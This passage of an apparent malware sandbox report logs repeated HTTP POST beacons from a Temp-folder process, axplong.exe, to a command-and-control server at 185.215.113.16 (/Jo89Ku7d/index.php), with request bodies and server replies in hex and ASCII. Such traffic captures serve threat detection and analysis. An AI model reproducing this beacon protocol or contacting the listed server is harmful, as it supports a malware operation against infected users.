                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:32.898487091 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:33.151348114 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:33 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              25192.168.2.651107185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:33.273516893 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:34.030066967 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:33 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:34.030886889 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:34.277672052 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:34 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              26192.168.2.651108185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:34.398389101 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:35.176794052 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:35 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:35.177727938 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:35.434612989 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:35 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              27192.168.2.651109185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:35.553489923 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:36.307928085 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:36 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:36.309175014 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:36.753010988 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:36 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              28192.168.2.651110185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:36.872548103 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:37.621932030 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:37 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:37.622709990 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:37.870968103 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:37 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              29192.168.2.651111185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:37.992974997 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:38.749280930 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:38 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:38.752742052 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:39.001477957 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:38 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              30192.168.2.651112185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:39.116029024 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:39.881031036 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:39 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:39.881711960 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:40.131341934 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:40 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              31192.168.2.651113185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:40.246699095 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:40.995807886 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:40 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:40.996995926 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:41.244425058 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:41 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              32192.168.2.651114185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:41.366251945 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:42.137684107 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:42 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:42.153704882 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:42.405893087 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:42 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              33192.168.2.651115185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:42.522808075 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:43.295447111 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:43 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:43.296531916 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:43.552113056 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:43 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              34192.168.2.651116185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:43.663384914 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:44.459116936 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:44 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:44.460222960 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:44.713229895 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:44 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              35192.168.2.651117185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:44.834817886 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:45.619643927 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:45.620762110 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:46.079377890 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0
                              Jul 26, 2024 20:59:46.081624985 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              36192.168.2.651118185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:46.198771000 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
